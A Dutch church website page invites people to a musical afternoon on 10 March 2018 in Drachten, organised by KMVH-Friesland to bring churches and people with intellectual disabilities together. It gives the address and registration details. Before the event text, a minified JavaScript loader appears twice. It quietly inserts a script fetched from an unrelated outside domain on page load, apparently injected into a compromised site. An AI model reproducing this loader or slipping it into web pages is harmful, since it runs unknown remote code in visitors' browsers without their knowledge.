;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Muzikale middag Kerken & Mensen met een Verstandelijke Handicap - PKN Damwâld
10 maart 2018
14:00 t/m 16:30
Muzikale middag Kerken & Mensen met een Verstandelijke Handicap

De KMVH-Friesland nodigt u en jou van harte uit voor een muzikale middag. De muziek wordt gemaakt door mensen met en zonder een beperking en is bedoeld voor iedereen. Muziek verbindt en dat is ook precies het doel van de KMVH.
De letters staan voor Kerken & Mensen met een Verstandelijke Handicap. De KMVH wil verbindingen leggen tussen kerken en mensen met een beperking. En dat doet de KMVH in de overtuiging dat zij over en weer veel voor elkaar kunnen betekenen. Kerken hebben veel te bieden en dat geldt ook voor mensen met beperkingen. Ook zij zijn mensen met gaven, waar kerken van mogen leren.
Muziek hoort daar helemaal bij. Daarom wordt deze middag georganiseerd om mensen met elkaar in contact te brengen. En wie weet, wat daaruit voortkomt! Misschien groeit bij u of jou het idee om daar iets mee te doen in een kerkdienst of in een andere bijeenkomst.
Vandaar dat we bij deze uitnodiging ook denken aan kerkenraadsleden, aan diaconale en pastorale werkers, aan gemeenteleden en andere belangstellenden en natuurlijk aan de mensen met een beperking.

Misschien kent u iemand met een beperking en kunt u samen met hem of haar komen? Wat u ook kunt doen, is andere mensen op deze middag wijzen. Misschien weet u plekken en tehuizen, waar posters opgehangen kunnen worden. Posters kunt u per mail aanvragen bij de secretaris.

Iedereen is van harte welkom op:

Zaterdag 10 maart 2018
in De Hoeksteen aan de Middelwyk 148 te Drachten
Aanvang: 14.00 uur
Sluiting: 16.30 uur

Kom en geef je vóór 24 februari op bij de secretaris: E-mail: piethulshof@kmvhfriesland.nl / Tel. 0516 – 842078